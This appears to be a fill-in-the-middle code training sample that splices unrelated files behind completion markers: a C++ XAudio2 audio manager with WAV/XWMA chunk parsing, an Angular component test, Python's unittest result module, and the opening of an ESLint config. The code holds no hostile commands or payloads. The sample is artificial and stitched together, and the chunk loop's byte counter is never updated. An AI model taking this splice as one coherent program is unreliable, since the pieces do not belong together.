for( VoiceMap::iterator iter = m_mVoices.begin(); iter != m_mVoices.end(); ++iter )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
if( info == nullptr )
continue;
//info->voice->Stop();
//info->voice->FlushSourceBuffers();
info->voice->DestroyVoice();
}
m_mVoices.clear();
<|fim▁hole|> // Clear handles
m_VoiceManager.Clear();
m_HandleManager.Clear();
// Release submix & master voices
m_pMusVoice->DestroyVoice();
m_pMusVoice = nullptr;
m_pSfxVoice->DestroyVoice();
m_pSfxVoice = nullptr;
m_pMasterVoice->DestroyVoice();
m_pMasterVoice = nullptr;
// Release XAudio2
m_pXAudio->Release();
m_pXAudio = nullptr;
CoUninitialize();
m_eStatus = E_DESTROYED;
return true;
}
//*************************************************************//
//*************************************************************//
// GET MASTER VOLUME
int AudioManager::GetMasterVolume( AudioGroup group )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetMasterVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
// Sanity-check the parameter
assert( (group == AudioGroup::Music || group == AudioGroup::SoundEffects) && "AudioManager::GetMasterVolume - invalid group" );
// Get the master volume from the submix voice
float fVolume = 0.0f;
if( group == AudioGroup::Music )
m_pMusVoice->GetVolume( &fVolume );
else //if( type == AudioGroup::SoundEffects )
m_pSfxVoice->GetVolume( &fVolume );
// Scale 0 -> +100 (account for floating point error)
return (int)(fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET MASTER VOLUME
bool AudioManager::SetMasterVolume( AudioGroup group, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetMasterVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Sanity-check the parameter
assert( (group == AudioGroup::Music || group == AudioGroup::SoundEffects) && "AudioManager::SetMasterVolume - invalid group" );
//assert( value >= 0 && value <= 100 && "AudioManager::SetMasterVolume - volume must be between 0 -> 100" );
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
// Set the submix voice volume
HRESULT result = 0;
if( group == AudioGroup::Music )
result = m_pMusVoice->SetVolume( (float)( value / 100.0f ) );
else //if( group == AudioGroup::SoundEffects )
result = m_pSfxVoice->SetVolume( (float)( value / 100.0f ) );
return SUCCEEDED( result );
}
//*************************************************************//
//*************************************************************//
// LOAD AUDIO
HAudio AudioManager::LoadAudio( const wchar_t* filename )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::LoadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( filename != nullptr && filename[0] != L'\0' && "AudioManager::LoadAudio - invalid filename" );
if( filename == nullptr || filename[0] == L'\0' )
return SGD::INVALID_HANDLE;
// Attempt to find the audio in the Handle Manager
SearchInfo search = { filename, nullptr, SGD::INVALID_HANDLE };
m_HandleManager.ForEach( &AudioManager::FindAudioByName, &search );
// If it was found, increase the reference & return the existing handle
if( search.audio != NULL )
{
search.audio->unRefCount++;
return search.handle;
}
// Could not find audio in the Handle Manager
AudioInfo data = { };
ZeroMemory( &data.format, sizeof( data.format ) );
ZeroMemory( &data.buffer, sizeof( data.buffer ) );
ZeroMemory( &data.bufferwma, sizeof( data.bufferwma ) );
// Attempt to load from file
HRESULT hResult = LoadAudio( filename, data.format, data.buffer, data.bufferwma );
if( FAILED( hResult ) )
{
// MESSAGE
wchar_t wszBuffer[ 256 ];
_snwprintf_s( wszBuffer, 256, _TRUNCATE, L"!!! AudioManager::LoadAudio - failed to load audio file \"%ws\" (0x%X) !!!", filename, hResult );
OutputDebugStringW( wszBuffer );
OutputDebugStringA( "\n" );
MessageBoxW( GetActiveWindow(), wszBuffer, L"AudioManager::LoadAudio", MB_OK );
return SGD::INVALID_HANDLE;
}
// Audio loaded successfully
data.wszFilename = _wcsdup( filename );
data.unRefCount = 1;
data.fVolume = 1.0f;
// Store audio into the Handle Manager
return m_HandleManager.StoreData( data );
}
//*************************************************************//
//*************************************************************//
// LOAD AUDIO
HAudio AudioManager::LoadAudio( const char* filename )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::LoadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( filename != nullptr && filename[0] != '\0' && "AudioManager::LoadAudio - invalid filename" );
if( filename == nullptr || filename[0] == '\0' )
return SGD::INVALID_HANDLE;
// Convert the filename to UTF16
wchar_t widename[ MAX_PATH * 4 ];
int ret = MultiByteToWideChar( CP_UTF8, 0, filename, -1, widename, MAX_PATH * 4 );
if( ret == 0 )
{
// MESSAGE
char szBuffer[ 256 ];
_snprintf_s( szBuffer, 256, _TRUNCATE, "!!! AudioManager::LoadAudio - invalid filename \"%hs\" (0x%X) !!!", filename, GetLastError() );
OutputDebugStringA( szBuffer );
OutputDebugStringA( "\n" );
return SGD::INVALID_HANDLE;
}
// Use the UTF16 load
return LoadAudio( widename );
}
//*************************************************************//
//*************************************************************//
// PLAY AUDIO
HVoice AudioManager::PlayAudio( HAudio handle, bool looping )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::PlayAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return SGD::INVALID_HANDLE;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::PlayAudio - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return SGD::INVALID_HANDLE;
// Could create a VoicePool to recycle voices
// Voices can be reused for other audio files as long
// as they have the same samplerate and channels
// (the frequency rate may need to be modified)
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::PlayAudio - handle has expired" );
if( data == nullptr )
return SGD::INVALID_HANDLE;
HRESULT hResult = S_OK;
// Create parameter (send descriptor) for submix voice
XAUDIO2_SEND_DESCRIPTOR desc = { 0 };
if( data->bufferwma.PacketCount == 0 )
desc.pOutputVoice = m_pSfxVoice;
else
desc.pOutputVoice = m_pMusVoice;
XAUDIO2_VOICE_SENDS sendlist = { 1, &desc };
// Create a voice with the proper wave format
IXAudio2SourceVoice* pVoice = nullptr;
hResult = m_pXAudio->CreateSourceVoice( &pVoice, (WAVEFORMATEX*)&data->format, 0U, 2.0f, nullptr, &sendlist );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to create voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Use the XAUDIO2_BUFFER for the voice's source
if( data->bufferwma.PacketCount == 0 )
hResult = pVoice->SubmitSourceBuffer( &data->buffer );
else
hResult = pVoice->SubmitSourceBuffer( &data->buffer, &data->bufferwma );
if( FAILED( hResult ) )
{
pVoice->DestroyVoice();
pVoice = nullptr;
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to submit source buffer (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Set the volume
pVoice->SetVolume( data->fVolume );
// Start the voice's thread
hResult = pVoice->Start( 0 );
if( FAILED( hResult ) )
{
pVoice->DestroyVoice();
pVoice = nullptr;
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PlayAudio - failed to start voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return SGD::INVALID_HANDLE;
}
// Store the voice
VoiceInfo info = { handle, pVoice, looping, false };
HVoice hv = m_VoiceManager.StoreData( info );
if( hv != SGD::INVALID_HANDLE )
m_mVoices.insert( VoiceMap::value_type( handle, hv ) );
return hv;
}
//*************************************************************//
//*************************************************************//
// IS AUDIO PLAYING
bool AudioManager::IsAudioPlaying( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsAudioPlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::IsAudioPlaying - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Find all voices with this handle
VoiceMap::_Paircc range = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Check if there are any active voices for this handle
if( IsVoicePlaying( iter->second ) == true )
return true;
}
return false;
}
//*************************************************************//
//*************************************************************//
// STOP AUDIO
bool AudioManager::StopAudio( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::StopAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::StopAudio - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Find all voices with this handle
VoiceMap::_Paircc range = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Get the voice info from the Handle Manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
if( info == nullptr )
continue;
// Destroy (or recycle) the voice
info->voice->DestroyVoice();
info->voice = nullptr;
// Remove the voice from the HandleManager
m_VoiceManager.RemoveData( iter->second, nullptr );
}
// Remove the voices from the active map
m_mVoices.erase( handle );
return true;
}
//*************************************************************//
//*************************************************************//
// UNLOAD AUDIO
bool AudioManager::UnloadAudio( HAudio& handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::UnloadAudio - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Quietly ignore bad handles
if( m_HandleManager.IsHandleValid( handle ) == false )
{
handle = SGD::INVALID_HANDLE;
return false;
}
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
if( data == nullptr )
return false;
// Release a reference
data->unRefCount--;
// Is this the last reference?
if( data->unRefCount == 0 )
{
// Stop the audio
StopAudio( handle );
// Deallocate the audio buffers
delete[] data->buffer.pAudioData;
delete[] data->bufferwma.pDecodedPacketCumulativeBytes;
// Deallocate the name
delete[] data->wszFilename;
// Remove the audio info from the handle manager
m_HandleManager.RemoveData( handle, nullptr );
}
// Invalidate the handle
handle = INVALID_HANDLE;
return true;
}
//*************************************************************//
//*************************************************************//
// IS VOICE VALID
bool AudioManager::IsVoiceValid( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsVoicePlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
// Validate the handle
return m_VoiceManager.IsHandleValid( handle );
}
//*************************************************************//
//*************************************************************//
// IS VOICE PLAYING
bool AudioManager::IsVoicePlaying( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::IsVoicePlaying - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::IsVoicePlaying - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::IsVoicePlaying - handle has expired" );
if( data == nullptr )
return false;
// Is the voice playing?
return !data->paused;
}
//*************************************************************//
//*************************************************************//
// PAUSE VOICE
bool AudioManager::PauseVoice( HVoice handle, bool pause )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::PauseVoice - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::PauseVoice - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::PauseVoice - handle has expired" );
if( data == nullptr )
return false;
// Stop the voice?
if( pause == true )
{
HRESULT hResult = data->voice->Stop( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PauseVoice - failed to stop voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
}
else
{
HRESULT hResult = data->voice->Start( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::PauseVoice - failed to start voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
}
data->paused = pause;
return true;
}
//*************************************************************//
//*************************************************************//
// STOP VOICE
bool AudioManager::StopVoice( HVoice& handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::StopVoice - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::StopVoice - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::StopVoice - handle has expired" );
if( data == nullptr )
return false;
// Stop the voice
HRESULT hResult = data->voice->Stop( 0 );
if( FAILED( hResult ) )
{
// MESSAGE
char szBuffer[ 128 ];
_snprintf_s( szBuffer, 128, _TRUNCATE, "!!! AudioManager::StopVoice - failed to stop voice (0x%X) !!!\n", hResult );
OutputDebugStringA( szBuffer );
return false;
}
// Destroy the voice
data->voice->DestroyVoice();
data->voice = nullptr;
// Find all voices with the audio handle
VoiceMap::_Paircc range = m_mVoices.equal_range( data->audio );
for( VoiceMap::const_iterator iter = range.first; iter != range.second; ++iter )
{
// Remove this voice handle
if( iter->second == handle )
{
m_mVoices.erase( iter );
break;
}
}
// Remove the voice info from the handle manager
m_VoiceManager.RemoveData( handle, nullptr );
// Invalidate the handle
handle = SGD::INVALID_HANDLE;
return true;
}
//*************************************************************//
//*************************************************************//
// GET VOICE VOLUME
int AudioManager::GetVoiceVolume( HVoice handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetVoiceVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::GetVoiceVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return 0;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::GetVoiceVolume - handle has expired" );
if( data == nullptr )
return 0;
// Scale 0 -> +100 (account for floating point error)
float fVolume = 0.0f;
data->voice->GetVolume( &fVolume );
return (int)(fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET VOICE VOLUME
bool AudioManager::SetVoiceVolume( HVoice handle, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetVoiceVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::SetVoiceVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the voice info from the handle manager
VoiceInfo* data = m_VoiceManager.GetData( handle );
assert( data != nullptr && "AudioManager::SetVoiceVolume - handle has expired" );
if( data == nullptr )
return false;
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
float fVolume = value / 100.0f; // scaled to 0 -> +1
HRESULT hResult = data->voice->SetVolume( fVolume );
if( FAILED( hResult ) )
return false;
return true;
}
//*************************************************************//
//*************************************************************//
// GET AUDIO VOLUME
int AudioManager::GetAudioVolume( HAudio handle )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::GetAudioVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return 0;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::GetAudioVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return 0;
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::GetAudioVolume - handle has expired" );
if( data == nullptr )
return 0;
// Scale 0 -> +100 (account for floating point error)
return (int)(data->fVolume * 100.0f + 0.5f);
}
//*************************************************************//
//*************************************************************//
// SET AUDIO ATTRIBUTE
bool AudioManager::SetAudioVolume( HAudio handle, int value )
{
// Sanity-check the wrapper's status
assert( m_eStatus == E_INITIALIZED && "AudioManager::SetAudioVolume - wrapper has not been initialized" );
if( m_eStatus != E_INITIALIZED )
return false;
assert( handle != SGD::INVALID_HANDLE && "AudioManager::SetAudioVolume - invalid handle" );
if( handle == SGD::INVALID_HANDLE )
return false;
// Get the audio info from the handle manager
AudioInfo* data = m_HandleManager.GetData( handle );
assert( data != nullptr && "AudioManager::SetAudioVolume - handle has expired" );
if( data == nullptr )
return false;
// Cap the range 0->100
if( value < 0 )
value = 0;
else if( value > 100 )
value = 100;
data->fVolume = value / 100.0f; // scaled to 0 -> +1
// Set active voices' volume
bool success = true;
std::pair< VoiceMap::const_iterator, VoiceMap::const_iterator > rangePair = m_mVoices.equal_range( handle );
for( VoiceMap::const_iterator iter = rangePair.first; iter != rangePair.second; ++iter )
{
// Get the voice info from the handle manager
VoiceInfo* info = m_VoiceManager.GetData( iter->second );
assert( info != nullptr && "AudioManager::SetAudioVolume - voice handle has expired" );
if( info == nullptr )
continue;
HRESULT hResult = info->voice->SetVolume( data->fVolume );
if( FAILED( hResult ) )
success = false;
}
return success;
}
//*************************************************************//
//*************************************************************//
// XAudio2 file input
// - MSDN http://msdn.microsoft.com/en-us/library/windows/desktop/ee415781%28v=vs.85%29.aspx
#ifdef _XBOX // Big-Endian
enum ECharacterCode
{
E_CC_RIFF = 'RIFF',
E_CC_DATA = 'data',
E_CC_FMT = 'fmt ',
E_CC_WAVE = 'WAVE',
E_CC_XWMA = 'XWMA',
E_CC_DPDS = 'dpds'
};
#else // Little-Endian
enum ECharacterCode
{
E_CC_RIFF = 'FFIR',
E_CC_DATA = 'atad',
E_CC_FMT = ' tmf',
E_CC_WAVE = 'EVAW',
E_CC_XWMA = 'AMWX',
E_CC_DPDS = 'sdpd'
};
#endif
/*static*/ HRESULT AudioManager::FindChunk( HANDLE hFile, DWORD fourcc, DWORD& dwChunkSize, DWORD& dwChunkDataPosition )
{
HRESULT hResult = S_OK;
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, 0, NULL, FILE_BEGIN ) )
return HRESULT_FROM_WIN32( GetLastError() );
DWORD dwChunkType;
DWORD dwChunkDataSize;
DWORD dwRIFFDataSize = 0;
DWORD dwFileType;
DWORD bytesRead = 0;
DWORD dwOffset = 0;
while( hResult == S_OK )
{
DWORD dwRead;
if( 0 == ReadFile( hFile, &dwChunkType, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
if( 0 == ReadFile( hFile, &dwChunkDataSize, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
switch( dwChunkType )
{
case E_CC_RIFF:
dwRIFFDataSize = dwChunkDataSize;
dwChunkDataSize = 4;
if( 0 == ReadFile( hFile, &dwFileType, sizeof(DWORD), &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
break;
default:
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, dwChunkDataSize, NULL, FILE_CURRENT ) )
return HRESULT_FROM_WIN32( GetLastError() );
}
dwOffset += sizeof(DWORD) * 2;
if( dwChunkType == fourcc )
{
dwChunkSize = dwChunkDataSize;
dwChunkDataPosition = dwOffset;
return S_OK;
}
dwOffset += dwChunkDataSize;
if( bytesRead >= dwRIFFDataSize )
return S_FALSE;
}
return S_OK;
}
/*static*/ HRESULT AudioManager::ReadChunkData( HANDLE hFile, void* buffer, DWORD buffersize, DWORD bufferoffset )
{
HRESULT hResult = S_OK;
if( INVALID_SET_FILE_POINTER == SetFilePointer( hFile, bufferoffset, NULL, FILE_BEGIN ) )
return HRESULT_FROM_WIN32( GetLastError() );
DWORD dwRead;
if( 0 == ReadFile( hFile, buffer, buffersize, &dwRead, NULL ) )
hResult = HRESULT_FROM_WIN32( GetLastError() );
return hResult;
}
/*static*/ HRESULT AudioManager::LoadAudio( const wchar_t* filename, WAVEFORMATEXTENSIBLE& wfx, XAUDIO2_BUFFER& buffer, XAUDIO2_BUFFER_WMA& bufferWMA )
{
    // Open the file for shared reading.
    HANDLE hFile = CreateFileW( filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
    if( hFile == INVALID_HANDLE_VALUE )
        return HRESULT_FROM_WIN32( GetLastError() );

    // Rewind to the start of the file.
    if( SetFilePointer( hFile, 0, NULL, FILE_BEGIN ) == INVALID_SET_FILE_POINTER )
    {
        HRESULT hr = HRESULT_FROM_WIN32( GetLastError() );
        CloseHandle( hFile );   // BUGFIX: handle was leaked on this early return
        return hr;
    }

    // Check the file type, should be 'WAVE' or 'XWMA'
    DWORD dwChunkSize;
    DWORD dwChunkPosition;
    FindChunk( hFile, E_CC_RIFF, dwChunkSize, dwChunkPosition );
    DWORD filetype;
    ReadChunkData( hFile, &filetype, sizeof(DWORD), dwChunkPosition );
    if( filetype != E_CC_WAVE && filetype != E_CC_XWMA )
    {
        CloseHandle( hFile );   // BUGFIX: handle was leaked on the unknown-type path
        return E_UNEXPECTED;
    }

    // Fill out the WAVEFORMATEXTENSIBLE structure with the contents of the FMT chunk.
    FindChunk( hFile, E_CC_FMT, dwChunkSize, dwChunkPosition );
    ReadChunkData( hFile, &wfx, dwChunkSize, dwChunkPosition );

    // Read the contents of the DATA chunk into the audio data buffer.
    // NOTE: ownership of pDataBuffer transfers to the caller via buffer.pAudioData.
    FindChunk( hFile, E_CC_DATA, dwChunkSize, dwChunkPosition );
    BYTE* pDataBuffer = new BYTE[ dwChunkSize ];
    ReadChunkData( hFile, pDataBuffer, dwChunkSize, dwChunkPosition );

    // Fill the XAUDIO2_BUFFER
    buffer.AudioBytes = dwChunkSize;        // size of the audio buffer in bytes
    buffer.pAudioData = pDataBuffer;        // buffer containing audio data
    buffer.Flags = XAUDIO2_END_OF_STREAM;   // tell the source voice not to expect any data after this buffer

    // Fill the wma buffer if necessary
    if( filetype == E_CC_XWMA )
    {
        // Read the contents of the DPDS chunk into the wma data buffer
        FindChunk( hFile, E_CC_DPDS, dwChunkSize, dwChunkPosition );
        UINT32 nPackets = (dwChunkSize + (sizeof(UINT32)-1)) / sizeof(UINT32); // round size up to whole DWORDs
        UINT32* pWmaDataBuffer = new UINT32[ nPackets ];
        ReadChunkData( hFile, pWmaDataBuffer, dwChunkSize, dwChunkPosition );

        // Fill the XAUDIO2_BUFFER_WMA (ownership transfers to the caller)
        bufferWMA.PacketCount = nPackets;                           // size of the audio buffer in DWORDS
        bufferWMA.pDecodedPacketCumulativeBytes = pWmaDataBuffer;   // buffer containing wma data
    }

    CloseHandle( hFile );   // BUGFIX: handle was leaked on the success path as well
    return S_OK;
}
//*************************************************************//
//*************************************************************//
// FIND AUDIO BY NAME
// Iteration predicate used when scanning the audio store by filename.
// Returns true to continue the scan; returns false (stop) once the entry
// whose filename matches extra->filename is found, recording the match in
// extra->audio and extra->handle.
/*static*/ bool AudioManager::FindAudioByName( Handle handle, AudioInfo& data, SearchInfo* extra )
{
    const bool namesMatch = ( wcscmp( data.wszFilename, extra->filename ) == 0 );
    if( !namesMatch )
        return true;    // not this one - keep searching

    // Found it: remember the entry and its handle, then stop the iteration.
    extra->audio = &data;
    extra->handle = handle;
    return false;
}
//*************************************************************//
} // namespace SGD_IMPLEMENTATION
} // namespace SGD<|fim▁end|> | |
<|file_name|>stack-info.component.spec.ts<|end_file_name|><|fim▁begin|>import { async, ComponentFixture, TestBed } from '@angular/core/testing';
import { StackInfoComponent } from './stack-info.component';
describe('StackInfoComponent', () => {
let component: StackInfoComponent;
let fixture: ComponentFixture<StackInfoComponent>;
beforeEach(async(() => {
TestBed.configureTestingModule({
declarations: [ StackInfoComponent ]
})
.compileComponents();
}));
beforeEach(() => {
fixture = TestBed.createComponent(StackInfoComponent);
component = fixture.componentInstance;
fixture.detectChanges();
});
<|fim▁hole|><|fim▁end|> | it('should be created', () => {
expect(component).toBeTruthy();
});
}); |
<|file_name|>result.py<|end_file_name|><|fim▁begin|>"""Test result object"""
import os
import sys
import traceback
from StringIO import StringIO
from . import util
from functools import wraps
__unittest = True
def failfast(method):
    """Decorator for TestResult event methods.

    When the result object's ``failfast`` attribute is set (and truthy),
    request a stop via ``self.stop()`` before delegating to the wrapped
    method. Objects without a ``failfast`` attribute are treated as
    failfast-disabled.
    """
    def wrapper(self, *args, **kwargs):
        if getattr(self, 'failfast', False):
            self.stop()
        return method(self, *args, **kwargs)
    return wraps(method)(wrapper)
STDOUT_LINE = '\nStdout:\n%s'
STDERR_LINE = '\nStderr:\n%s'
class TestResult(object):
    """Holder for test result information.

    Test results are automatically managed by the TestCase and TestSuite
    classes, and do not need to be explicitly manipulated by writers of tests.

    Each instance holds the total number of tests run, and collections of
    failures and errors that occurred among those test runs. The collections
    contain tuples of (testcase, exceptioninfo), where exceptioninfo is the
    formatted traceback of the error that occurred.
    """
    # Bookkeeping used by the test runner for class/module-level fixtures.
    _previousTestClass = None
    _testRunEntered = False
    _moduleSetUpFailed = False

    def __init__(self, stream=None, descriptions=None, verbosity=None):
        # stream/descriptions/verbosity are accepted (and ignored here) so
        # subclasses used by text runners can share this signature.
        self.failfast = False
        self.failures = []
        self.errors = []
        self.testsRun = 0
        self.skipped = []
        self.expectedFailures = []
        self.unexpectedSuccesses = []
        self.shouldStop = False
        # When buffer is True, stdout/stderr are captured per test and only
        # echoed back (see _mirrorOutput) when a test fails or errors.
        self.buffer = False
        self._stdout_buffer = None
        self._stderr_buffer = None
        self._original_stdout = sys.stdout
        self._original_stderr = sys.stderr
        self._mirrorOutput = False

    def printErrors(self):
        "Called by TestRunner after test run"

    def startTest(self, test):
        "Called when the given test is about to be run"
        self.testsRun += 1
        self._mirrorOutput = False
        self._setupStdout()

    def _setupStdout(self):
        # Redirect stdout/stderr into StringIO buffers for the duration of
        # one test (only when buffering is enabled).
        if self.buffer:
            if self._stderr_buffer is None:
                self._stderr_buffer = StringIO()
                self._stdout_buffer = StringIO()
            sys.stdout = self._stdout_buffer
            sys.stderr = self._stderr_buffer

    def startTestRun(self):
        """Called once before any tests are executed.

        See startTest for a method called before each test.
        """

    def stopTest(self, test):
        """Called when the given test has been run"""
        self._restoreStdout()
        self._mirrorOutput = False

    def _restoreStdout(self):
        # Undo _setupStdout: optionally replay captured output (when the test
        # failed/errored), restore the real streams, and reset the buffers.
        if self.buffer:
            if self._mirrorOutput:
                output = sys.stdout.getvalue()
                error = sys.stderr.getvalue()
                if output:
                    if not output.endswith('\n'):
                        output += '\n'
                    self._original_stdout.write(STDOUT_LINE % output)
                if error:
                    if not error.endswith('\n'):
                        error += '\n'
                    self._original_stderr.write(STDERR_LINE % error)

            sys.stdout = self._original_stdout
            sys.stderr = self._original_stderr
            self._stdout_buffer.seek(0)
            self._stdout_buffer.truncate()
            self._stderr_buffer.seek(0)
            self._stderr_buffer.truncate()

    def stopTestRun(self):
        """Called once after all tests are executed.

        See stopTest for a method called after each test.
        """

    @failfast
    def addError(self, test, err):
        """Called when an error has occurred. 'err' is a tuple of values as
        returned by sys.exc_info().
        """
        self.errors.append((test, self._exc_info_to_string(err, test)))
        self._mirrorOutput = True

    @failfast
    def addFailure(self, test, err):
        """Called when an error has occurred. 'err' is a tuple of values as
        returned by sys.exc_info()."""
        self.failures.append((test, self._exc_info_to_string(err, test)))
        self._mirrorOutput = True

    def addSuccess(self, test):
        "Called when a test has completed successfully"
        pass

    def addSkip(self, test, reason):
        """Called when a test is skipped."""
        self.skipped.append((test, reason))

    def addExpectedFailure(self, test, err):
        """Called when an expected failure/error occurred."""
        self.expectedFailures.append(
            (test, self._exc_info_to_string(err, test)))

    @failfast
    def addUnexpectedSuccess(self, test):
        """Called when a test was expected to fail, but succeed."""
        self.unexpectedSuccesses.append(test)

    def wasSuccessful(self):
        "Tells whether or not this result was a success"
        return len(self.failures) == len(self.errors) == 0

    def stop(self):
        "Indicates that the tests should be aborted"
        self.shouldStop = True

    def _exc_info_to_string(self, err, test):
        """Converts a sys.exc_info()-style tuple of values into a string."""
        exctype, value, tb = err
        # Skip test runner traceback levels
        while tb and self._is_relevant_tb_level(tb):
            tb = tb.tb_next

        if exctype is test.failureException:
            # Skip assert*() traceback levels
            length = self._count_relevant_tb_levels(tb)
            msgLines = traceback.format_exception(exctype, value, tb, length)
        else:
            msgLines = traceback.format_exception(exctype, value, tb)

        if self.buffer:
            # Append any captured stdout/stderr to the formatted traceback.
            output = sys.stdout.getvalue()
            error = sys.stderr.getvalue()
            if output:
                if not output.endswith('\n'):
                    output += '\n'
                msgLines.append(STDOUT_LINE % output)
            if error:
                if not error.endswith('\n'):
                    error += '\n'
                msgLines.append(STDERR_LINE % error)
        return ''.join(msgLines)

    def _is_relevant_tb_level(self, tb):
        # Frames belonging to the unittest machinery mark themselves with a
        # module-global __unittest flag.
        return '__unittest' in tb.tb_frame.f_globals

    def _count_relevant_tb_levels(self, tb):
        length = 0
        while tb and not self._is_relevant_tb_level(tb):
            length += 1
            tb = tb.tb_next
        return length

    def __repr__(self):
        return ("<%s run=%i errors=%i failures=%i>" %
               (util.strclass(self.__class__), self.testsRun, len(self.errors),
                len(self.failures)))
<|file_name|>.eslintrc.js<|end_file_name|><|fim▁begin|>module.exports = {
root: true,
